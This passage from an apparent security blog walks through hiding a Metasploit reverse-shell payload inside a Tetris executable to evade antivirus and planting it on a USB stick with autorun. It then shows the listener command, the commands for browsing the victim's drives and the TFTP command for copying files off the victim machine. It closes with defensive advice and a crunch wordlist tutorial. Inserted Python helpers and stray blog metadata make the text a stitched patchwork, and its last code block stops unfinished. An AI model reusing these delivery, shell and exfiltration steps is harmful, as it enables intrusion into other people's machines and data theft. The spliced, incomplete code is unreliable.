<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="441" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf01.jpg" width="640" /></a></div><br />
In combination with the <span style="color: yellow;">-x</span> command in msfencode, you can also add the <span style="color: yellow;">-k</span> option which will run the template exe in a new thread.<br />
(So if included in the above example, would also open notepad.exe on the victim's pc when the payload is run).<br />
This does however change the size of the executable from the original legitimate executable and may give AV more cause to flag the exe file as suspicious. <br />
In this case I have opted to not use the -k option to keep the file sizes identical.<br />
<br />
So how did we do concerning the antivirus detection ? <br />
<div style="color: red;"><i>If you upload the payload to for instance VirusTotal.com for verification, you have an excellent chance that the file signatures will be forwarded to various AV vendors and updated accordingly in as quick as a day or two.. rendering that particular file / encoding useless..</i></div><br />
To test this case, I simply ensured that virus definitions were updated on the system and ran the AV scans locally.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/avg-scan.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="476" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/avg-scan.jpg" width="640" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/clamwin-result.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/clamwin-result.jpg" /></a></div><br />
So far so good.. !<br />
<br />
<br />
Now a bit of Social Engineering based on the inherent curiosity and playfulness of mankind ..<br />
to get the executable run on the target pc.<br />
<br />
There are several ways to do this, in this case my method was as follows ;<br />
> Renamed the payload.exe to tetris.exe<br />
> Bound the tetris.exe with an exe which runs a tetris game, and named the new exe <i>Tetris.exe</i><br />
<i>Using <b style="color: yellow;">IExpress</b> (readily installed on Win XP) to package the 2 executables.</i><br />
> Replaced the icon of the tetris.exe (with payload) with the original icon extracted from the original executable.<br />
<i> Used <b style="color: yellow;">IcoFX</b> for both the extraction and replacing of the icons.</i><br />
> Renamed a USB flash drive to <i>TETRIS</i>, saved the tetris.exe to root of the usb drive.<br />
> Created an autorun file to open up the Tetris.exe on insertion and saved to root of the usb drive<br />
(only works if autorun enabled of course)<br />
<br />
Something similar can also be done with a U3 USB flash drive;<br />
> Using <i><b style="color: yellow;">Universal Customizer</b></i> create a custom ISO image (ISOCreate.cmd) containing exe and autorun.inf file.<br />
> Run the Universal Customizer to have the standard U3 ISO replaced with the custom ISO.<br />
Now when placed in a PC with autorun enabled, there is no interaction needed to start the exe file. <br />
(So could simply place the payload in the iso section and be done with it, but where's the fun in that ?!)<br />
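The whole delivery above stands or falls on AutoRun starting whatever autorun.inf points at, so the defender's first question about a found USB stick is what its autorun.inf actually launches. The script below is an added example, not code from the post: it parses the [autorun] section the way Windows reads it (case-insensitive, first command word before any arguments) and reports every entry that starts a program, plus any custom AutoPlay prompt text. The autorun.inf text is constructed (Tetris.exe is the file name the post uses); which entries deserve a flag is my assumption, not a Windows rule.<br />

```python
"""Review an autorun.inf from removable media before the media is trusted.

Added example, not code from the original post. The autorun.inf below is
constructed (Tetris.exe is the name the post uses); the review rules are
assumptions about what deserves a flag, not a Windows API.
"""
import os
import shlex

LAUNCH_KEYS = {"open", "shellexecute"}          # run on insertion / AutoPlay
EXEC_EXT = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js"}


def parse_autorun_inf(text):
    """Return {key: value} from the [autorun] section, keys lower-cased.

    Section and key names are matched case-insensitively, as Windows does;
    other sections (for example [autorun.mips]) are ignored here.
    """
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_targets(entries):
    """(key, program) pairs for every entry that starts a program."""
    targets = []
    for key, value in entries.items():
        is_launch = key in LAUNCH_KEYS or (
            key.startswith("shell\\") and key.endswith("\\command"))
        if is_launch:
            # posix=False keeps Windows backslashes and honours "quoted name.exe"
            words = shlex.split(value, posix=False)
            program = words[0].strip('"') if words else ""
            targets.append((key, program))
    return targets


def review_autorun(text):
    """List of findings; an empty list means nothing on this media auto-starts."""
    entries = parse_autorun_inf(text)
    findings = []
    for key, program in launch_targets(entries):
        ext = os.path.splitext(program)[1].lower()
        kind = "executable" if ext in EXEC_EXT else "file with unexpected extension"
        findings.append(f"{key}= starts {kind} {program!r}")
    if "action" in entries:
        # Custom AutoPlay text is what makes the dialog look like a normal choice.
        findings.append(f"action= customises the AutoPlay prompt: {entries['action']!r}")
    return findings


# Constructed autorun.inf in the shape the post describes.
SAMPLE_AUTORUN = """\
[AutoRun]
open=Tetris.exe
icon=Tetris.exe,0
label=TETRIS
action=Play Tetris
shell\\play\\command=Tetris.exe
shell=play
"""

# Constructed benign file: only sets a volume label and an icon.
BENIGN_AUTORUN = "[autorun]\nlabel=BACKUP\nicon=backup.ico\n"

if __name__ == "__main__":
    for finding in review_autorun(SAMPLE_AUTORUN):
        print("FLAG:", finding)
```

The check is only a triage step for media that turns up; the real mitigation on the client side is to have AutoRun disabled for removable drives so that, as the post itself notes, the autorun.inf is never acted on.<br />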
<br />
<br />
Now we start listening for possible incoming connections on the 'attacker' pc, hand out the USB to possible target and wait.<br />
<br />
To start listening for incoming connections you can either use the msfconsole or msfcli,<br />
I will use msfcli ;<br />
<div style="color: lime;">cd /pentest/exploits/framework3/</div><div style="color: lime;">./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp \<br />
LHOST=192.168.1.100 LPORT=5632 E</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="268" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf04.jpg" width="640" /></a></div><br />
<br />
<br />
When the USB is plugged in it will open the usual menu (if autorun enabled) asking if you would like to<br />
open the folder or open the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/autorun-menu.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/autorun-menu.jpg" width="302" /></a></div><br />
<i>With the U3 USB flashdrive method, it will open the Tetris.exe file directly (if autorun enabled).</i><br />
<br />
Wait for target to play the game, sit back and wait for them to close the game so the payload will be executed.<br />
(The options in IExpress need one program to be run before the other)<br />
<br />
<br />
When that happens, you should get a shell and it is basically Game Over for the victim.<br />
<br />
Listing all drives ;<br />
<div style="color: lime;">fsutil fsinfo drives</div>Check what type of drive it is;<br />
<span style="color: lime;">fsutil fsinfo drivetype D:</span><br />
Just to get the info of a drive;<br />
<div style="color: lime;">fsutil fsinfo volumeinfo D:\</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf02A.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="442" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf02A.jpg" width="640" /></a></div><br />
Of course there are a myriad of options to use to check information on the drives.<br />
<br />
Using the usual commands to get drive names / labels and a list of folders / files<br />
<div style="color: lime;">dir C:\</div><div style="color: lime;">dir D:\</div><div style="color: lime;">dir E:\</div><br />
For a more targeted listing, go to directory of interest and list based on filetype; doc / zip / jpg / avi / etc etc<br />
<span style="color: lime;">dir /s/p/b \*.avi</span> <br />
<br />
<br />
<br />
To enable downloading and uploading in the shell you can use TFTPD.<br />
Start TFTPD on your backtrack machine<br />
(K Menu -- Services -- TFTP -- Start TFTPD) <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf05.jpg" /></a></div><br />
To 'download' from the victim machine ;<br />
<span style="color: lime;">tftp -i 192.168.1.105 put filename</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="442" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf06.jpg" width="640" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf07.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf07.jpg" width="640" /></a></div><br />
To 'upload' to the victim machine<br />
<span style="color: lime;">tftp -i 192.168.1.105 get filename</span> (from backtrack directory /tmp/)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf08.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="442" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/msf08.jpg" width="640" /></a></div><br />
<div style="color: yellow;"><b>So how to protect against such intrusions ? </b></div>======================================<br />
<br />
<div style="color: red;">Turn autorun off on your Windows system </div>The link below gives information on how to do this on multiple systems.<br />
<a href="http://support.microsoft.com/kb/967715/en-us">Disable the Autorun functionality in Windows</a><br />
Of course it goes without saying that you should always be careful of what you plug into and run on your system, but truth be told, we have all actually done this at one time, and one doesn't always have a virtual machine handy to test the process out on first..<br />
<br />
<div style="color: red;">Ensure AntiVirus definitions are up to date</div>Although in this example the exe bypassed the AV, it will not do so for long; it's only a matter of time before<br />
AV picks up on the signature, so always make sure your AV definitions are up to date.<br />
<br />
<div style="color: red;">Run a firewall that monitors <b>outgoing</b> connections in addition to <b>incoming </b>connections.</div>Having a firewall installed that monitors <b>outgoing</b> connections would have prevented the reverse_tcp session from getting out without any notifications.<br />
Windows firewall only monitors <b>incoming</b> connections, so having the reverse_tcp connecting out from the victim system does not raise any alarms. <br />
<br />
ZoneAlarm Firewall for instance will popup and advise that ***.exe is trying to connect to ***.<br />
That should set a few alarms off with the user.<br />
<br />
<br />
<div style="color: yellow;">Linkage on the information and the tools used ;</div>========================================<br />
<br />
Video by IronGeek on the packaging of executables with IExpress.<br />
<a href="http://www.irongeek.com/i.php?page=videos/binders-iexpress-trojans">http://www.irongeek.com/i.php?page=videos/binders-iexpress-trojans</a><br />
<br />
IcoFX Homepage<br />
<a href="http://icofx.ro/">http://icofx.ro/</a><br />
<br />
Universal Customizer information<br />
<a href="http://www.hak5.org/w/index.php/Universal_U3_LaunchPad_Hacker">http://www.hak5.org/w/index.php/Universal_U3_LaunchPad_Hacker</a><br />
<br />
<br />
<div style="color: yellow;"><b>A video showing the process as described above but with some slight changes</b></div><div style="color: yellow;"><b>as regarding a meterpreter session and using a different exe as template.</b></div><br />
<a href="http://blip.tv/file/3741812"><b>http://blip.tv/file/3741812</b></a><br />
<br />
<b>or</b><br />
<b> </b><br />
<a href="http://vimeo.com/12484065"><b>http://vimeo.com/12484065</b></a><br />
<b> </b><br />
<b>or</b><br />
<b> </b><br />
<b><a href="http://www.youtube.com/watch?v=C0px_dczD6I">http://www.youtube.com/watch?v=C0px_dczD6I</a></b><br />
<b> </b><br />
<b> </b>Unknownnoreply@blogger.com11tag:blogger.com,1999:blog-8356530514965708840.post-51238712243545334512010-04-02T20:37:00.117+02:002011-06-12T23:55:19.391+02:00Creating wordlists with crunch v2.4<div style="color: red;"><b>Edit 12-06-2011</b></div><div style="color: red;"><b>crunch v3.0 is now included in the BT repositories, </b><br />
<b>v3.0 has many bug fixes and additional functionality; some items/switches have however been altered.</b><br />
<b>Therefore, this post is superseded by ; </b></div><b><a href="http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html">http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html</a></b><br />
<br />
<br />
crunch is an invaluable tool for quickly (well.. depending on the size of wordlist..) creating bruteforce wordlists.<br />
<br />
The latest version released recently is v2.4 and compared with the release currently installed with backtrack 4 (v2.0) comes with some very cool additions. <br />
<i>The version of crunch in backtrack 4 repositories is expected to be updated within a few days to crunch v2.4</i><br />
<i><b>Edit dd 03-07-2010 -- Crunch 2.4 is finally included in latest updates !</b></i><br />
<br />
crunch is one of the first tools that comes to mind when a bruteforce wordlist is needed, and since it has been modified so heavily since I first stumbled on it with backtrack 3, I figured it was time for a full and comprehensive test to get to grips with all the latest goodness in it !<br />
<br />
The default path for crunch v2.4 in backtrack 4 is;<br />
<b>/pentest/passwords/crunch/</b><br />
<br />
<br />
crunch's output is printed to screen when no -o option is given to write to file, so you can easily check to see if it is doing what you wanted.<br />
It can also be piped through to additional programs such as aircrack or cowpatty.<br />
<br />
general usage is ;<br />
<br />
<div style="color: yellow;">./crunch &lt;min-length&gt; &lt;max-length&gt; [charset] -o wordlist.txt</div><br />
NOTE:<br />
It is close to impossible to stop crunch from still showing the command given, so the pics below are images of <b>part</b> of the output from the given command..<br />
<br />
<div style="color: yellow;">BASIC USAGE & CHARACTER SETS</div><div style="color: yellow;">==============================</div><br />
If no character set is defined, crunch defaults to using lower case alpha only ;<br />
<br />
<div style="color: lime;">./crunch 4 4</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/no-char-set.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/no-char-set.jpg" width="640" /></a></div><br />
<br />
The charset can be entered manually in the command line ; <br />
<br />
<div style="color: lime;">./crunch 4 4 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CHARANDNUMB.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CHARANDNUMB.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
The output can also be inverted using the -i option.<br />
<br />
So as opposed to ;<br />
<br />
<div style="color: lime;">./crunch 4 4 ABCDEFG </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Using the -i option will invert the direction when making the wordlist from left-to-right to right-to-left ;<br />
<div style="color: lime;">./crunch 4 4 ABCDEFG -i </div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="246" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-i-1.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or a charset can be chosen from the charset.lst file, which saves on the typing (and typos..) when dealing with normal ranges of letters, numbers and symbols.<br />
<span style="color: yellow;">charset.lst <i>(included in the crunch installation package) ;</i></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="426" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset.jpg" width="640" /></a></div><br />
<div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha-numeric</div><br />
The output using charsets can also be inverted using the -i option.<br />
<br />
<br />
<br />
<div style="color: yellow;">CREATING CUSTOM PATTERNS</div><div style="color: yellow;">==========================</div><br />
The great thing about crunch is the ability to create patterns with the -t option. This function has been greatly improved with crunch v2.3 and now offers many more possibilities than before. <br />
<br />
<br />
To create a wordlist with a prefix of 'dog' followed by the characters in a chosen charset ;<br />
<div style="color: lime;">./crunch 6 6 -f charset.lst lalpha -t dog@@@</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-dogaaa.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-dogaaa.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or having 'dog' appended to the end of the chosen charset ;<br />
<div style="color: lime;">./crunch 6 6 -f charset.lst lalpha -t @@@dog</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aaadog.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aaadog.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Or to have 'dog' bang in the middle ;<br />
<div style="color: lime;">./crunch 7 7 -f charset.lst lalpha -t @@dog@@</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aadogaa.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-aadogaa.jpg" width="640" /></a></div><br />
In this latest version of crunch it is also possible to create a pattern specifying where you want<br />
characters / numbers / symbols,<br />
which can really be handy in reducing the overall size of the wordlist if you know there is a certain pattern involved; <br />
<br />
<div style="color: lime;">./crunch 6 6 -f charset.lst mixalpha -t @dog%^</div>In the above example ;<br />
<span style="color: yellow;">@</span> --> will read and print from the specified character set only.<br />
<span style="color: yellow;">%</span> --> will print numeric values only.<br />
<span style="color: yellow;">^</span> --> will print symbols/special characters only, including space.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-adogns.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-adogns.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
This feature opens up easier and powerful options for creating lists with certain patterns of special characters or numbers;<br />
<br />
For a 4 character wordlist containing only special characters.<br />
<div style="color: lime;">./crunch 4 4 -t ^^^^</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-symbol.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-symbol.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
For a 4 character wordlist containing numbers and special characters in the sequence; 1$1$<br />
<div style="color: lime;">./crunch 4 4 -t %^%^</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-nsns.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-nsns.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
For a 4 letter wordlist containing characters and numbers in the sequence; a1a1<br />
<div style="color: lime;">./crunch 4 4 -t @%@%</div><i>Note that if no character set is defined, crunch defaults to lower case alpha character set when using @ </i><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-anan.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-anan.jpg" width="640" /></a></div><br />
<br />
<br />
For a 4 letter wordlist containing characters from a character set and special characters in the sequence A$A$<br />
<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha-numeric-space -t @^@^</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-asas.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-asas.jpg" width="640" /></a></div><br />
<br />
Character sets to use for the -t option can also be specified ; <br />
<br />
To use ;<br />
<span style="color: yellow;">ABCD</span> as characters<br />
<span style="color: yellow;">1234</span> as numeric values<br />
<span style="color: yellow;">@#$%</span> as symbols<br />
<br />
<div style="color: lime;">./crunch 6 6 -t @dog%^ ABCD 1234 @#$%</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset1.jpg" width="640" /></a></div><br />
or<br />
<br />
<div style="color: lime;">./crunch 7 7 -t ^@dog%@ ABCD 1234 @#$%</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-t-charset2.jpg" width="640" /></a></div><br />
<br />
<br />
Note that when specifying character sets like this for use with the -t option, the sequence of the character set specification <b>must </b>be;<br />
alpha -- numeric -- symbols<br />
<br />
Some special characters need escaping. To do this, make sure a backslash <span style="color: red;">\</span> is placed before the character to escape, so for instance using the above example, but requiring a symbol charset of ;<br />
<div style="color: yellow;">!()& </div><br />
<div style="color: lime;">./crunch 6 6 -t @dog%^ ABCD 1234 <span style="color: red;">\</span>!<span style="color: red;">\</span>(<span style="color: red;">\</span>)<span style="color: red;">\</span>&</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/escaping.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/escaping.jpg" width="640" /></a></div><br />
<br />
<br />
<div style="color: #6aa84f;"><div style="color: yellow;">STRING PERMUTATIONS</div></div><div style="color: yellow;">====================</div><br />
Crunch also now has the possibility to generate permutations instead of combinations on either strings of characters or words. <br />
<br />
To generate permutations on characters, specify with the -p option, fun for anagrams !<br />
(although crunch then ignores min and max length, you do still need to enter them) <br />
<br />
<div style="color: lime;">./crunch 1 1 -p dog</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-p.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-p.jpg" width="640" /></a></div><br />
<br />
<br />
To generate permutations on words/strings, specify them with the -m option<br />
(again, although the min and max length are ignored, they do need to be entered). <br />
The -m option does not (yet) have the capability to read from a file; this has, however, been placed on the author's to-do list.<br />
<br />
<div style="color: lime;">./crunch 1 1 -m cat dog pig</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-m.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-m.jpg" width="640" /></a></div><br />
<br />
<br />
<div style="color: #6aa84f;"><div style="color: yellow;">OUTPUT OPTIONS</div></div><div style="color: yellow;">===============</div><br />
Resulting output from crunch can also be split in various sizes, based on either line count or on actual size and can also be compressed.<br />
<br />
<br />
To split the output based on line count, use the -c option combined with -o START ; <br />
<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o START -c 100000</span> <br />
The above will result in files being created containing no more than 100000 words (lines). <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-c-1k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-c-1k.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Output files can be split into files of a certain maximum size using the -b option combined with -o START.<br />
The size definition can be; kb, mb, gb or kib, mib, gib<br />
kb, mb, and gb are based on the power of 10 (i.e. 1KB = 1000 bytes)<br />
kib, mib, and gib are based on the power of 2 (i.e. 1KB = 1024 bytes). <br />
<br />
Creating files no larger than 500kb :<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o START -b 500kb</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-500k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-500k.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
Creating files no larger than 1mb :<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o START -b 1mb</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-1mb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-b-1mb.jpg" width="640" /></a></div><br />
<br />
<br />
<br />
<br />
Output files can also be compressed with the -z option, using either bzip, gzip or lzma<br />
<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst lalpha -o wordlist -z gzip</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot02-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="243" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/snapshot02-1.jpg" width="640" /></a></div><br />
<br />
<br />
A resume function is also built-in with the -r option;<br />
After cancelling the build of the wordlist, the exact same syntax must be used again followed with the -r option ; <br />
<br />
<div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha -o wordlist.txt </div><div style="color: lime;">./crunch 4 4 -f charset.lst mixalpha -o wordlist.txt -r</div><div class="separator" style="clear: both; text-align: center;"><a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-r.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="242" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/option-r.jpg" width="640" /></a></div><br />
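The -t placeholders (@ % ^), the -i inversion, the -p / -m permutations and the sizes that -c / -b end up splitting, modelled in Python as an added example; this is not crunch's own code, the symbol set used for ^ and the concatenation of permuted words are assumptions.<br />

```python
# Added example (not crunch's code): a small model of crunch v2.4's -t pattern
# placeholders, the -i inversion, -p/-m permutations, and a size estimate so you
# know what -c/-b will have to split before generating a single line.
import itertools
import math
import string

LALPHA = string.ascii_lowercase          # crunch's default when no charset is given
NUMERIC = string.digits
# Assumption: a representative symbol set, including space, for the '^' placeholder.
SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "


def pattern_slots(pattern, alpha=LALPHA, numeric=NUMERIC, symbols=SYMBOLS):
    """Map each pattern position to the characters it may take.

    '@' -> the chosen (alpha) charset, '%' -> numeric, '^' -> symbols;
    anything else is a literal fixed at that position (e.g. 'dog' in '@dog%^').
    """
    lookup = {"@": alpha, "%": numeric, "^": symbols}
    return [lookup.get(ch, ch) for ch in pattern]


def expand_pattern(pattern, invert=False, **charsets):
    """Yield every word matching the pattern.

    Like crunch, the rightmost variable position changes fastest; with
    invert=True (crunch's -i) the leftmost position changes fastest instead.
    """
    slots = pattern_slots(pattern, **charsets)
    if not invert:
        for combo in itertools.product(*slots):
            yield "".join(combo)
    else:
        for combo in itertools.product(*reversed(slots)):
            yield "".join(reversed(combo))


def count_words(pattern, **charsets):
    """Number of words the pattern expands to (product of the slot sizes)."""
    return math.prod(len(slot) for slot in pattern_slots(pattern, **charsets))


def estimate_split(pattern, lines_per_file=None, bytes_per_file=None, **charsets):
    """Estimate output size and how many files -c (lines) or -b (bytes) would give.

    Each output line is the word plus a newline, so bytes = words * (len + 1).
    """
    words = count_words(pattern, **charsets)
    total_bytes = words * (len(pattern) + 1)
    files = 1
    if lines_per_file:
        files = max(files, math.ceil(words / lines_per_file))
    if bytes_per_file:
        files = max(files, math.ceil(total_bytes / bytes_per_file))
    return {"words": words, "bytes": total_bytes, "files": files}


def permute(items):
    """Unique orderings of a string's characters (-p) or of a list of words (-m).

    Assumption: each ordering is emitted as its pieces concatenated, no separator.
    """
    seen = set()
    for order in itertools.permutations(items):
        word = "".join(order)
        if word not in seen:
            seen.add(word)
            yield word


if __name__ == "__main__":
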